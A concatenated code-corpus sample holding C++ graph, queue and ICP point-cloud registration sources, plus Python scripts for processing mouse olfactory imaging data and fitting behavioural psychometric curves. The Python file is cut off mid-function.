     *\brief Recursive depth-first traversal; prints each visited vertex.
     *\param v start vertex
     */
    void DFS(int v);
    /*!
     *\brief Breadth-first traversal; prints each visited vertex.
     *\param v start vertex
     */
    void BFS(int v);
    /*!
     *\brief Writes the adjacency matrix to an already-open file stream.
     *\param file stream handle to write to
     */
    void save_matrix(std::fstream& file)const;
    /*!
     *\brief Finds the fewest-hops path from start to meta via BFS and pushes
     * it onto the given list (start ends up first).
     *\param start start vertex
     *\param meta target vertex
     *\param L list receiving the path
     *\return true when a path was found
     */
    bool BFSPath(int start, int meta, Lista<int> *L);
};
#endif // GRAPH_HH_INCLUDED
<file_sep>#include "queue.hh"
#include <iostream>
/*!
*\file queue.cpp
*\brief implementuje zdefiniowana klase kolejki
*/
// Appends `element` at the back; handles both empty and non-empty queues.
void queue::push(int element)
{
    queue_node *tmp = new queue_node();
    tmp->next=NULL;
    tmp->data=element;
    if(last)
        last->next=tmp;
    else
        first=tmp;   // queue was empty: the new node is also the front
    last=tmp;
}
// Removes and frees the front element; silently does nothing when empty.
void queue::pop()
{
    if(first)
    {
        queue_node* tmp=first;
        first=first->next;
        if(!first)
            last = NULL;   // queue became empty: reset the tail pointer too
        delete tmp;
    }
}
// Prints every element from front to back, separated by spaces, then a newline.
// Bug fix: the loop condition was `tmp->next != NULL`, which stopped one node
// early and never printed the last element of the queue.
void queue::print()const
{
    queue_node *tmp=first;
    if(!first)
        std::cout << std::endl;
    else
        while(tmp!=NULL)
        {
            std::cout << tmp->data << " ";
            tmp=tmp->next;
        }
    std::cout << std::endl;
}
// Destructor: pops (and frees) every remaining node.
queue::~queue()
{
    while(first)
        pop();
}
// True exactly when the queue holds no nodes (head and tail are both NULL;
// push/pop maintain the invariant that they are set or cleared together).
bool queue::is_empty()const
{
    return !(first && last);
}
// Returns the front element without removing it.
// Returns the sentinel -2147483647 when the queue is empty, so callers
// should check is_empty() first.
int queue::front(void)
{
    if(first) return first->data;
    else return -2147483647;
}
<file_sep>#ifndef GLOBAL_H_INCLUDED
#define GLOBAL_H_INCLUDED
#include <windows.h>
/*!
*\file
*przechowuje zmienne globalne
*/
#if defined(UNICODE) && !defined(_UNICODE)
#define _UNICODE
#elif defined(_UNICODE) && !defined(UNICODE)
#define UNICODE
#endif
#include <tchar.h>
#include <windows.h>
#include <iostream>
#define ID_BUTTON1 101
#define ID_BUTTON2 102
#define ID_BUTTON3 103
#define ID_STATICTEXTBOX1 201
#define ID_STATICTEXTBOX2 202
#define ID_STATICTEXTBOX3 203
#define ID_COMANDLINE 301
/* Declare Windows procedure */
LRESULT CALLBACK WindowProcedure( HWND, UINT, WPARAM, LPARAM );
/* Make the class name into a global variable */
TCHAR szClassName[] = _T( "WindowsApp" );
/* Handles to the UI controls (three rows of label / edit box / button). */
HWND hCommandLine;
HWND hExecButton;
HWND hStaticDebugBox;
HWND hCommandLine2;
HWND hExecButton2;
HWND hStaticDebugBox2;
HWND hCommandLine3;
HWND hExecButton3;
HWND hStaticDebugBox3;
/* Buffer holding the text read from the active edit box. */
LPSTR CommandLineBuf;
using std::cout;
using std::endl;
/* Shared application state.
 * NOTE(review): `fstream`, `Lista<int>` and `CGraph` are used unqualified
 * here; this header only compiles when included after <fstream>, stack.hh
 * and graph.hh with `using namespace std;` in effect — and defining objects
 * in a header restricts it to a single translation unit. Confirm intended. */
fstream plik;
Lista<int> C;
int i,j;
int licznik=0;
int start_path;
int end_path;
CGraph *G;
LPSTR tmp_string;
HWND hwnd; /* This is the handle for our window */
#endif // GLOBAL_H_INCLUDED
<file_sep>#ifndef FORMAT_H_INCLUDED
#define FORMAT_H_INCLUDED
#include <string>
#include <windows.h>
using namespace std;
/*!
*\file
*przechowuje funkcje konwertujace
*string
*/
/*!
 *\brief Converts an int to its decimal string representation.
 *\param n the value to convert
 *\return the decimal text, with a leading '-' for negative values
 * Replaces the hand-rolled digit loop with std::to_string, which also
 * handles INT_MIN correctly (the old `n = -n;` overflowed on INT_MIN).
 */
std::string intToStr(int n)
{
    return std::to_string(n);
}
/*!
 *\brief Renders the vertex-id path stored in the list as "->a->b->c".
 *\param C pointer to the list holding the path
 *\return pointer to a static buffer, valid until the next call
 * Bug fix: the original returned `const_cast<char*>(local.c_str())`, a
 * pointer into a std::string that was destroyed on return — a dangling
 * pointer. The buffer is now `static` so it outlives the call.
 * NOTE(review): this makes the function non-reentrant; fine for the single
 * UI thread using it here.
 */
LPSTR ZamienFormat(Lista<int> *C)
{
    static string wynik;   // must outlive the call; see note above
    wynik.clear();
    Lista<int> *tmp = C->nastepny;   // skip the sentinel head node
    while(tmp)
    {
        wynik += "->";
        wynik += intToStr(tmp->dane);
        tmp = tmp->nastepny;
    }
    return const_cast<char *>(wynik.c_str());
}
#endif // FORMAT_H_INCLUDED
<file_sep>#include "graph.hh"
#include "queue.hh"
#include "stack.hh"
//#include "global.h"
#include <iostream>
#include <fstream>
#include <windows.h>
/*!
*\file graph.cpp
*\brief implementuje zdefiniowana klase grafu
*/
// Writes the V x V adjacency matrix to the given (already open) stream,
// one space-separated row per line.
void CGraph::save_matrix(std::fstream& file)const
{
    for(int i=0; i <V; i++)
    {
        for(int j=0; j<V; j++)
            file << matrix[i][j] << " ";
        file << std::endl;
    }
}
// Allocates and zeroes the V x V adjacency matrix and the visited array.
// Bug fix: `visited` was allocated but never initialized, so DFS()/BFS()
// read indeterminate values on a freshly constructed graph.
CGraph::CGraph(int v, int e) : V(v), E(e)
{
    matrix = new int*[V];
    for(int i=0; i<V; i++)
    {
        matrix[i] = new int[V];
    }
    for(int i=0; i<V; i++)
        for(int j=0; j<V; j++)
            matrix[i][j]=0;
    visited = new bool[v];
    for(int i=0; i<V; i++)
        visited[i] = false;
}
// Frees every matrix row, the row-pointer array and the visited array.
CGraph::~CGraph()
{
    for(int i=0; i<V; i++)
    {
        delete [] matrix[i];
    }
    delete [] matrix;
    delete [] visited;
}
// Marks the two vertices as mutually adjacent (undirected edge).
void CGraph::set_graph(int verticle1, int verticle2)
{
    matrix[verticle1][verticle2]=1;
    matrix[verticle2][verticle1]=1;
}
// Prints the adjacency matrix to stdout, one row per line.
void CGraph::print_matrix()const
{
    for(int i=0; i <V; i++)
    {
        for(int j=0; j<V; j++)
            std::cout << matrix[i][j] << " ";
        std::cout << std::endl;
    }
}
// Recursive depth-first traversal from v; prints each vertex on first visit.
// NOTE(review): relies on `visited` being reset before the first call — a
// second traversal on the same object will see stale flags.
void CGraph::DFS(int v)
{
    visited[v]=1;
    std::cout << v << " ";
    for(int i=0; i<V; i++)
    {
        if(matrix[v][i]==1 and visited[i]==0)
            DFS(i);
    }
}
// Breadth-first traversal from v; prints each vertex as it is dequeued.
// Bug fix: the original allocated the queue with `new` and then called its
// destructor explicitly (`x->~queue()`) without `delete`, leaking the queue
// object itself. The queue now has automatic storage.
// NOTE(review): like DFS, this assumes `visited` was reset beforehand.
void CGraph::BFS(int v)
{
    queue x;
    x.push(v);
    visited[v]=true;
    while(x.first)
    {
        v=x.first->data;
        x.pop();
        std::cout << v << " ";
        for(int i=0; i<V; i++)
            if((matrix[v][i]==1) && !visited[i])
            {
                x.push(i);
                visited[i]=true;
            }
    }
    std::cout << std::endl;
}
// Breadth-first search for the fewest-hops path from start to meta.
// On success the path is pushed onto L (so start ends up at the head),
// printed via L->wyswietl(), and true is returned.
// Bug fix: the predecessor array P was leaked on both the "not found" and
// the success exit paths; it is now released before every return.
// NOTE(review): the neighbour scan starts at i=1, so vertex 0 can never be
// an intermediate hop — confirm whether that is intentional.
bool CGraph::BFSPath(int start, int meta, Lista<int> *L)
{
    queue k;
    bool found;
    int v;
    for(int i=0; i<V; i++)
        visited[i]=false;
    int *P=new int[V];   // P[x] = predecessor of x on the BFS tree
    P[start]=-1;
    k.push(start);
    visited[start]=true;
    found=false;
    while(!k.is_empty())
    {
        v=k.front();
        k.pop();
        if(v==meta)
        {
            found=true;
            break;
        }
        for(int i=1; i<V; i++)
            if(!visited[i] && matrix[v][i]==1)
            {
                P[i] = v;
                k.push(i);
                visited[i] = true;
            }
    }
    if(!found)
    {
        std::cout << "sciezka nie zostala odnaleziona" << std::endl;
        delete [] P;
        return false;
    }
    // Walk the predecessor chain back from meta; pushing reverses the order.
    while(v>-1)
    {
        L->push(v);
        v=P[v];
    }
    L->wyswietl();
    delete [] P;
    return true;
}
| 38c17d547906166b82e3d15f7297e600f687159a | [
"C++"
] | 8 | C++ | makuchwo/209429 | badb2bae60b9fb8451966914083af18501c71a8b | 777920e3311d24795ebd3ee15aa7294c92a93514 |
refs/heads/master | <file_sep>#include <iostream>
#include <pcl/io/pcd_io.h>
#include <pcl/point_types.h>
#include <list>
#include <ctime>
#include <pcl/registration/icp.h>
using namespace std;
using namespace pcl;
// Registers 1.pcd (source) onto 2.pcd (target) with PCL's Iterative
// Closest Point, prints the fitness score and final transform, and saves
// the aligned cloud to outdata.pcd.
int main (int argc, char** argv)
{
    pcl::PointCloud<pcl::PointXYZ>::Ptr cloud_in (new pcl::PointCloud<pcl::PointXYZ>);
    pcl::PointCloud<pcl::PointXYZ>::Ptr cloud_out (new pcl::PointCloud<pcl::PointXYZ>);
    pcl::IterativeClosestPoint<pcl::PointXYZ, pcl::PointXYZ> icp;
    // Fill in the CloudIn data
    pcl::io::loadPCDFile("./1.pcd", *cloud_in);
    pcl::io::loadPCDFile("./2.pcd", *cloud_out);
    icp.setInputCloud(cloud_in);
    icp.setInputTarget(cloud_out);
    // Set the max correspondence distance to 5cm (e.g., correspondences with higher distances will be ignored)
    icp.setMaxCorrespondenceDistance (5);
    // Set the maximum number of iterations (criterion 1)
    icp.setMaximumIterations (50000000);
    // Set the transformation epsilon (criterion 2)
    icp.setTransformationEpsilon (1e-18);
    // Set the euclidean distance difference epsilon (criterion 3)
    icp.setEuclideanFitnessEpsilon (0.001);
    // Obtain the transformation that aligned cloud_source to cloud_source_registered
    //Eigen::Matrix4f transformation = icp.getFinalTransformation ();
    pcl::PointCloud<pcl::PointXYZ> Final;
    icp.align(Final);
    std::cout << "has converged:" << icp.hasConverged() << " score: " <<
    icp.getFitnessScore() << std::endl;
    std::cout << icp.getFinalTransformation() << std::endl;
    // Persist the aligned source cloud.
    pcl::io::savePCDFileASCII("./outdata.pcd",Final);
    return (0);
}
| 35b8f9c950ffcab3f03148f2c8a79983ffba8119 | [
"C++"
] | 1 | C++ | x86isnice/ICP | 11a08da88eb632574b6307db1a6261e10b0a51fe | b6c399a54733ba626acf6b5b5534369ca35ac073 |
refs/heads/master | <repo_name>johannesmaxkappel/iospy<file_sep>/iospy.py
'''
Basic image processing functions for imaging data from NeuroCCD camera
Copyright <NAME> & E.Chong 2017
'''
from scipy.ndimage import fourier_gaussian
import numpy as np
from skimage import exposure
import matplotlib.pyplot as plt
import seaborn as sns
import cv2
import sys
import os
sns.set_style('white')
def read_data(filepath, dFrame = True):
    """Load a Turbo-SM .tsm recording (FITS-style header + int16 frames).

    Parses NAXIS1/NAXIS2/NAXIS3 from the 2880-byte header, slices the raw
    pixel stream into per-frame 2-D float64 arrays, and optionally subtracts
    the final frame (treated as the dark frame) from every frame.

    :param filepath: path to the .tsm file
    :param dFrame: when True, subtract the dark frame from each frame
    :return: list of nFrames + 1 float64 arrays; the last entry is the dark
             frame itself (all zeros after subtraction when dFrame is True)
    """
    fn = open(filepath, 'rb')
    # FITS-style header: 36 records of 80 characters = 2880 bytes.
    header = fn.read(2880)
    pixels = np.fromstring(fn.read(), dtype='int16')
    header = [header[i:i + 80] for i in range(0, len(header), 80)]
    # remove all whitespaces
    for i, h in enumerate(header):
        header[i] = h.replace(' ', '')
    # Scan KEY=VALUE records until the END marker; only NAXIS1/2/3 are used.
    for h in header:
        if h == 'END':
            break
        else:
            param, value = h.split('=')
            if param == 'NAXIS1':
                width = int(value)
            elif param == 'NAXIS2':
                height = int(value)
            elif param == 'NAXIS3':
                nFrames = int(value)
            else:
                pass
    nPixels = width * height
    print 'Resolution:{0}x{1}'.format(width, height)
    print 'Number of pixels:', nPixels
    sys.stdout.flush()
    trialframes = []
    # nFrames + 1: one extra frame beyond NAXIS3 is read and used below as
    # the dark frame.
    for frameno in range(0, nFrames+1):
        frame = pixels[frameno * nPixels:(frameno + 1) * nPixels]
        frame = np.reshape(frame, (width, height))
        frame = frame.astype('float64')
        trialframes.append(frame)
    print 'Number of processed frames:', len(trialframes)
    sys.stdout.flush()
    darkframe = trialframes[nFrames]
    if dFrame:
        # Dark-frame correction (the dark frame subtracts itself to zero).
        for frameno, frame in enumerate(trialframes):
            frame = frame - darkframe
            trialframes[frameno] = frame
    return trialframes
def compute_average(trialframes, t1=500, t2=1600):
    """Mean odor response normalised by the odor-period mean.

    Averages frames 10..t1-10 as baseline and t1+10..t2-10 as the odor
    period (a 10-frame guard band on each side), and returns
    (odor - baseline) / odor with any non-finite pixels replaced by the
    array minimum.

    :param trialframes: sequence of 2-D frames
    :param t1: frame index where the odor period starts
    :param t2: frame index where the odor period ends
    :return: 2-D array of normalised responses
    """
    baseline = np.mean(trialframes[10:t1 - 10], axis=0)
    odor = np.mean(trialframes[t1 + 10:t2 - 10], axis=0)
    response = (odor - baseline) / odor
    response[~np.isfinite(response)] = response.min()
    return response
def plot_signal(trialframes, t1, t2):
    """Plot the mean dF/F time course over the odor period.

    Baseline is the mean of frames 10..t1-10; each odor-period frame is
    normalised as (frame - baseline) / baseline, reduced to its spatial
    mean, and plotted against frame index. Shows the figure; returns None.

    :param trialframes: sequence of 2-D frames
    :param t1: odor-onset frame index
    :param t2: odor-offset frame index
    """
    blframes_mean = np.mean(trialframes[10:t1-10], axis=0)
    oframes = trialframes[t1+10:t2-10]
    oframes_seq = []
    for oframe in oframes:
        oframe_r = (oframe - blframes_mean)/blframes_mean
        oframes_seq.append(np.mean(oframe_r))
    # np.mean over the already-scalar entries is a no-op kept from the original.
    plt.plot([x for x in range(0, len(oframes_seq))], [np.mean(frame) for frame in oframes_seq])
    plt.show()
    pass
def rescale_int(im, lower=2, upper=98):
    """Contrast-stretch `im` between the given percentile bounds.

    :param im: input image array
    :param lower: lower percentile of the input range
    :param upper: upper percentile of the input range
    :return: intensity-rescaled image (via skimage.exposure)
    """
    lo, hi = np.percentile(im, (lower, upper))
    return exposure.rescale_intensity(im, in_range=(lo, hi))
def normalize(im):
    """Linearly rescale an array so its values span [0, 1].

    :param im: input array (must not be constant, or the result is NaN)
    :return: shifted/scaled copy with min 0 and max 1
    """
    shifted = im - im.min()
    return shifted / shifted.max()
def convert_dtype(im):
    """Convert a [0, 1] float image to 16-bit unsigned integers.

    Bug fix: the original multiplied by 2**16 (65536), so a pixel of exactly
    1.0 wrapped around to 0 in uint16 — the brightest pixels came out black.
    Scaling by 2**16 - 1 maps 1.0 to the maximum uint16 value instead.

    :param im: float array with values in [0, 1]
    :return: uint16 array scaled to the full 16-bit range
    """
    im = im * (2 ** 16 - 1)
    return im.astype('uint16')
def process_im(im,
               scale=85,
               int_lower=2,
               int_upper=98,
               cut=(0,256),
               bpass=True,
               resc_int=True
               ):
    """Post-process an averaged response image into a uint16 image.

    The image is cropped to the `cut` rows, split into left/right halves
    (the two hemispheres / bulbs), each half normalised and optionally
    contrast-stretched, re-joined, optionally band-pass filtered, padded
    back to the original height, and converted to uint16.

    :param im: 2-D response image (assumed square, e.g. 256x256 — TODO confirm)
    :param scale: spatial scale passed to bp_fft
    :param int_lower: lower percentile for rescale_int
    :param int_upper: upper percentile for rescale_int
    :param cut: (first_row, last_row) crop applied before processing
    :param bpass: apply the Fourier band-pass filter when True
    :param resc_int: apply percentile contrast stretching when True
    :return: uint16 image with the original (width, height) shape
    """
    width, height = im.shape
    odor_normed = im[cut[0]:cut[1], ]
    lframe = np.split(odor_normed, 2, axis=1)[0]
    rframe = np.split(odor_normed, 2, axis=1)[1]
    pframes = []
    # Normalise (and optionally stretch) each half independently so one
    # bright hemisphere does not dominate the other.
    for split in [lframe, rframe]:
        split = normalize(split)
        if resc_int:
            split = rescale_int(split, lower=int_lower, upper=int_upper)
        pframes.append(split)
    a = np.concatenate(pframes, axis=1)
    if bpass:
        a = bp_fft(a, scale=scale)
        # Re-normalise after filtering, which shifts the value range.
        # NOTE(review): indentation inferred — confirm this belongs inside
        # the `if bpass:` branch.
        a = normalize(a)
    if cut != (0,256):
        # Pad the cropped rows back with zeros so the output keeps the
        # original frame size.
        a = np.ravel(a)
        r1 = np.zeros(width * (cut[0]))
        r2 = np.zeros(width * (width - cut[1]))
        a = np.insert(a, 0, r1, axis=0)
        a = np.insert(a, cut[1] * width, r2, axis=0)
        a = np.reshape(a, (width, height))
    a = convert_dtype(a)
    return a
def bp_fft(im, scale=85):
sigma = scale * 0.15
input_im = np.fft.fft2(im)
low = fourier_gaussian(input_im, sigma=sigma)
input_im = input_im - low
high = fourier_gaussian(input_im, sigma=0.3)
highr = np.fft.ifft2(high)
return highr.real
def process_ref(mouse, date, extension=''):
    """Average each reference .tsm recording into a PNG snapshot.

    Reads every .tsm file in C:/Turbo-SM/SMDATA/<mouse>_<date>_ref<extension>,
    averages all frames, runs process_im without band-pass filtering, and
    writes ref_<mouse>_<date>_<n>.png both next to the data and into the
    VoyeurData spots folder.

    :param mouse: animal identifier used in the path templates
    :param date: session date used in the path templates
    :param extension: optional suffix of the ref folder name
    """
    path = 'C:/Turbo-SM/SMDATA/{0}_{1}_ref{2}'.format(mouse, date, extension)
    assert os.path.exists(path), 'File path not found!'
    spotpath = 'C:/VoyeurData/{0}/spots/{1}'.format(mouse, date)
    if not os.path.exists(spotpath):
        os.makedirs(spotpath)
    tsmcount = 0
    for tsm in os.listdir(path):
        if not tsm.endswith('tsm'):
            continue
        tsmcount += 1
        print 'processing file no. {0}: {1}'.format(tsmcount, tsm)
        ref_frames = read_data(os.path.join(path, tsm))
        ref_average = np.mean(ref_frames, axis=0)
        ref_average = process_im(ref_average, bpass=False, cut=(0,256))
        cv2.imwrite(os.path.join(path, 'ref_{0}_{1}_{2}.png'.format(mouse, date, tsmcount)), ref_average)
        cv2.imwrite(os.path.join(spotpath, 'ref_{0}_{1}_{2}.png'.format(mouse, date, tsmcount)), ref_average)
    return
def process_single_odorant(mouse,
                           date,
                           odorant,
                           ref=True,
                           average=True,
                           bpass=True,
                           resc_int=True,
                           scale=85,
                           cut=(5,251),
                           path=''
                           ):
    """Process every trial of one odorant and write per-trial + average TIFFs.

    For each .tsm file in the odorant's folder: load it, compute the
    normalised odor response, post-process it via process_im, save and show
    the result. When more than one trial exists, also save/show the mean
    across trials.

    :param mouse: animal identifier used in the path templates
    :param date: session date used in the path templates
    :param odorant: odorant name (third component of the folder name)
    :param ref: when True, also process the session's reference recordings
    :param average: intended to toggle the across-trial average
        (NOTE(review): currently ignored — see the `pass` below)
    :param bpass/resc_int/scale/cut: forwarded to process_im
    :param path: optional base folder; defaults to C:/Turbo-SM/SMDATA/
    """
    if path == '':
        path = 'C:/Turbo-SM/SMDATA/{0}_{1}_{2}'.format(mouse, date, odorant)
    else:
        path = os.path.join(path, '{0}_{1}_{2}'.format(mouse, date, odorant))
    assert os.path.exists(path), 'File path not found!'
    spotpath = 'C:/VoyeurData/{0}/spots/{1}'.format(mouse, date)
    if not os.path.exists(spotpath):
        os.makedirs(spotpath)
    odor_averaged = []
    tsmcount = 0
    if ref:
        process_ref(mouse, date)
    for tsm in os.listdir(path):
        if not tsm.endswith('tsm'):
            continue
        tsmcount += 1
        print 'processing file no. {0}: {1}'.format(tsmcount, tsm)
        trialframes = read_data(os.path.join(path,tsm))
        odor_normed = compute_average(trialframes, t1=500, t2=len(trialframes))
        odor_final = process_im(odor_normed, cut=cut, bpass=bpass, scale=scale, resc_int=resc_int)
        cv2.imwrite(os.path.join(path, '{0}_{1}_{2}_trial{3}.tif'.format(mouse, date, odorant, tsmcount)), odor_final)
        cv2.imwrite(os.path.join(spotpath, '{0}_{1}_{2}_trial{3}.tif'.format(mouse, date, odorant, tsmcount)), odor_final)
        plt.imshow(odor_final)
        plt.show()
        odor_averaged.append(odor_normed)
    if len(odor_averaged) > 1:
        if not average:
            # NOTE(review): `pass` does not skip the averaging below;
            # was this meant to be `return`? Confirm intended behavior.
            pass
        average_final = np.mean(odor_averaged, axis=0)
        average_final = process_im(average_final, cut=cut, bpass=bpass, scale=scale, resc_int=resc_int)
        cv2.imwrite(os.path.join(path, '{0}_{1}_{2}_averaged.tif'.format(mouse, date, odorant)), average_final)
        cv2.imwrite(os.path.join(spotpath, '{0}_{1}_{2}_averaged.tif'.format(mouse, date, odorant)), average_final)
        plt.imshow(average_final)
        plt.show()
        pass
    else:
        pass
def process_imaging_sess(mouse,
date,
path='',
bpass=True,
resc_int = True,
ref=False
):
if path == '':
path = 'C:/Turbo-SM/SMDATA/'
for imgfolder in os.listdir(path):
if imgfolder.startswith('{0}_{1}'.format(mouse, date)):
if imgfolder.endswith('ref'):
continue
odorant = '_'.join(imgfolder.split('_')[2:])
process_single_odorant(mouse, date, odorant, ref=False, bpass=bpass, path=path, resc_int=resc_int)
if ref:
process_ref(mouse, date)
pass<file_sep>/pyformance.py
import h5py
import os
from collections import defaultdict as ddict
import pickle
from scipy.stats import binom
from scipy.optimize import minimize
from collections import OrderedDict
import matplotlib.pyplot as plt
import seaborn as sns
sns.set_style("white")
import numpy as np
def weibull(x, p):
t, b, a, g = p
k = -log(((1.0 - a) / (1.0 - g)) ** (1.0 / b))
y = 1.0 - (1.0 - g) * (e ** - (((k * x) / t) ** b))
return y
def weibull_chris(x, p):
"""
:param i: parameter value for the stimulus (ie intensity)
:param alpha:
:param beta:
:param guess:
:param lapse:
:return:
"""
alpha, beta, guess, lapse = p
return ((1. - lapse) - (1. - guess - lapse) *
np.exp(-(x / alpha) ** beta))
def find_fit(p, data):
bounds=[(0.001,None),(0.001,None),(0.001,1),(0.001,1)]
return minimize(logmaxlikelihood, p, args=data, method='L-BFGS-B', bounds=bounds)
def binom_logpmf(k, n, p):
"""
:param x: number of successes
:param n: number of trials shape parameter
:param p: probability shape parameter
:return:
"""
# v1 = log(binom_coeff(n, x))
# v1 = log(comb(n, x))
# v2 = x * log(p)
# v3 = (n - x) * log1p(-p) # log(1+(-p))
return binom.logpmf(k, n, p)
def logmaxlikelihood(p, args, f='weibull'):
'''
data structure:
x: array of independent variables, i.e. stimuli
k: array of number of successes for each x
n: array of total number of trials for each x
'''
t, b, a, g = p
x, k, n = args
res = weibull_chris(x, p)
return -np.sum(binom_logpmf(k, n, res))
def binP(N, p, x1, x2):
p = float(p)
q = p/(1-p)
k = 0.0
v = 1.0
s = 0.0
tot = 0.0
while(k<=N):
tot += v
if(k >= x1 and k <= x2):
s += v
if(tot > 10**30):
s = s/10**30
tot = tot/10**30
v = v/10**30
k += 1
v = v*q*(N+1-k)/k
return s/tot
def binomial_CI(vx, vN, vCL = 95):
'''
Calculate the exact (Clopper-Pearson) confidence interval for a binomial proportion
Usage:
>>> calcBin(13,100)
(0.07107391357421874, 0.21204372406005856)
>>> calcBin(4,7)
(0.18405151367187494, 0.9010086059570312)
'''
vx = float(vx)
vN = float(vN)
#Set the confidence bounds
vTU = (100 - float(vCL))/2
vTL = vTU
vP = vx/vN
if(vx==0):
dl = 0.0
else:
v = vP/2
vsL = 0
vsH = vP
p = vTL/100
while((vsH-vsL) > 10**-5):
if(binP(vN, v, vx, vN) > p):
vsH = v
v = (vsL+v)/2
else:
vsL = v
v = (v+vsH)/2
dl = v
if(vx==vN):
ul = 1.0
else:
v = (1+vP)/2
vsL =vP
vsH = 1
p = vTU/100
while((vsH-vsL) > 10**-5):
if(binP(vN, v, 0, vx) < p):
vsH = v
v = (vsL+v)/2
else:
vsL = v
v = (v+vsH)/2
ul = v
return (dl, ul)
def new_pfmcheck(pfm, sw, thresh):
if len(pfm) > sw:
pfmtrue = [p1 for p1 in pfm if not p1 == 'x']
avrg = np.mean(pfmtrue[-sw:])
if avrg < thresh:
return False
else:
return True
else:
return True
def new_analyse(mouse, session, plot=False, sw=20, thresh=0.59, multiple_c=False):
path = 'R:\\Rinberglab\\rinberglabspace\\Users\\Johannes\\taar_stim\\behavior'
resdict = ddict(lambda: [0, 0, 0])
pfm = []
filepath = '{0}\\{1}\\{0}_{2}_{3}.h5'.format(
mouse,
session,
session.split('-')[0],
session.split('-')[1]
)
assert os.path.exists(os.path.join(path, filepath)), '{0}/{1} does not exist!'.format(path, filepath)
h5file = h5py.File(os.path.join(path, filepath), 'r')
results = h5file['Trials']['result']
concs = h5file['Trials']['odorconc']
dmd = h5file['Trials']['stim_desc']
stimids = h5file['Trials']['stimid']
lpfm = []
rpfm = []
tpfm = []
cdict = {
'0.02': '0_100',
'0.01': '5_95',
'0.05': '25_75',
'0.076': '38_62',
'0.086': '43_57',
'0.114': '57_43',
'0.124': '62_38',
'0.15': '75_25',
'0.19': '95_5',
'0.2': '100_0'
}
ldict = {
'0.114': '57_43',
'0.124': '62_38',
'0.15': '75_25',
'0.19': '95_5',
'0.2': '100_0'
}
rdict = {
'0.02': '0_100',
'0.01': '5_95',
'0.05': '25_75',
'0.076': '38_62',
'0.086': '43_57',
}
lstims = [l for l in ldict.keys()]
rstims = [l for l in rdict.keys()]
stimiddict = {
'left' : [4, 9, 12, 15],
'right' : [2, 5, 10, 15]
}
for rno, r in enumerate(results):
if rno < sw:
continue
light = dmd[rno]
conc = concs[rno]
stimid = stimids[rno]
if str(conc) in lstims:
trialdir = 'left'
elif str(conc) in rstims:
trialdir = 'right'
else:
print 'Concentration not found in cdict:', str(conc)
break
if 'DMDoff' in light:
if multiple_c:
if int(stimid) in stimiddict[trialdir]:
stimtype = '{0}_{1}'.format(cdict[str(conc)], '1.5')
else:
stimtype = cdict[str(conc)]
else:
stimtype = cdict[str(conc)]
else:
stimtype = '{0}_{1}'.format(cdict[str(conc)], light[:2])
if r in [1, 4]: # left
if r == 4:
r = 0
lpfm.append(r)
tpfm.append(r)
else:
lpfm.append(r)
tpfm.append(r)
rpfm.append('x')
checkl = new_pfmcheck(lpfm, sw, thresh)
checkr = new_pfmcheck(rpfm, sw, thresh)
if checkl and checkr:
resdict[stimtype][0] += 1
elif r in [2, 3]: # right
if r == 3:
r = 0
rpfm.append(r)
tpfm.append(r)
else:
r = 1
rpfm.append(r)
tpfm.append(r)
lpfm.append('x')
checkl = new_pfmcheck(lpfm, sw, thresh)
checkr = new_pfmcheck(rpfm, sw, thresh)
if checkl and checkr:
resdict[stimtype][1] += 1
else: # no response
if concs[rno] in lstims:
lpfm.append(0)
rpfm.append('x')
tpfm.append(0)
else:
rpfm.append(0)
lpfm.append('x')
tpfm.append(0)
check = new_pfmcheck(tpfm, sw, thresh)
if check:
resdict[stimtype][2] += 1
if plot:
plt.figure(figsize=(14, 8))
for pfm in [lpfm, rpfm, tpfm]:
pfm_sw = []
for pno, p in enumerate(pfm):
if pno > sw:
pfmtrue = [p1 for p1 in pfm[:pno + 1] if not p1 == 'x']
avrg = round(np.mean(pfmtrue[-sw:]), 2)
elif pfm != []:
pfmtrue = [p1 for p1 in pfm[:pno + 1] if not p1 == 'x']
avrg = round(np.mean(pfmtrue[:]), 2)
elif p == 2:
avrg = 0
else:
avrg = p
pfm_sw.append(avrg)
plt.plot(pfm_sw)
plt.ylim(0, 1)
plt.legend(['left', 'right', 'total'])
plt.show()
return resdict
class Data:
def __init__(self, name, sw, thresh, multiple_c=False):
self.name = name
self.multiple_c = multiple_c
self.path = 'R:\\Rinberglab\\rinberglabspace\\Users\\Johannes\\taar_stim\\behavior'
assert os.path.exists(self.path), 'Network drive not connected!'
if not os.path.exists(os.path.join(self.path, 'mouse_data_{0}.p'.format(self.name))):
self.mouse_data = {'8202': {}}
with open(os.path.join(self.path, 'mouse_data_{0}.p'.format(self.name)), 'wb') as f:
pickle.dump(self.mouse_data, f)
else:
with open(os.path.join(self.path, 'mouse_data_{0}.p'.format(self.name)), 'rb') as f:
self.mouse_data = pickle.load(f)
self.sw = sw
self.thresh = thresh
def add_data(self, sessions):
for mouse in sessions.keys():
try:
mouse_dict = self.mouse_data[mouse]
except:
self.mouse_data[mouse] = {}
mouse_dict = self.mouse_data[mouse]
for session in sessions[mouse]:
if isinstance(session, list):
session = session[0]
if session in self.mouse_data[mouse].keys():
continue
else:
resdict = new_analyse(mouse, session, sw=self.sw, thresh=self.thresh, multiple_c=self.multiple_c)
self.mouse_data[mouse][session] = dict(resdict)
with open(os.path.join(self.path, 'mouse_data_{0}.p'.format(self.name)), 'wb') as f:
pickle.dump(self.mouse_data, f)
def plot_data(self, curve=True, probe=True, multiple_c=False, probe_curve=False, scatter=False):
plots = []
colors = {'odor + T3 stim': 'r', 'odor + T4 stim': 'g', 'odor': 'b', 'odor 1.5-fold': 'c'}
for mouse, sessions in sorted(self.mouse_data.items()):
fig, ax = plt.subplots(figsize=(10, 8))
sdict = ddict(list)
pdict = ddict(list)
x = []
curvedict = ddict(lambda: [[],[],[]])
for session in sessions:
for stim, result in self.mouse_data[mouse][session].items():
pdict[stim].append(result)
totalt = 0
for stim, result in sorted(pdict.items()):
mix = stim.split('_')
if len(mix) < 3:
mode = 'odor'
elif mix[2] == '1.5':
mode = 'odor 1.5-fold'
elif probe:
if 'T' in mix[2]:
mode = 'odor + {0} stim'.format(mix[2])
else:
continue
else:
continue
pea_c = round(float(stim.split('_')[0]) * 0.01, 2)
if not multiple_c:
if mode == 'odor 1.5-fold':
continue
performance = []
totalr = 0
silent = 0
left = 0
for [l, r, s] in result:
totalt += l + r + s
subtotal = l + r
totalr += subtotal
silent += s
left += l
if l > 0:
performance.append(float(l) / float(subtotal))
else:
performance.append(0.0)
if not mode == 'odor':
sf = float(s) / float(l + r + s)
sdict[stim].append(sf)
if scatter:
scatter_i = ax.scatter([pea_c] * len(performance), [performance], color=colors[mode], alpha=.3)
# plot mean
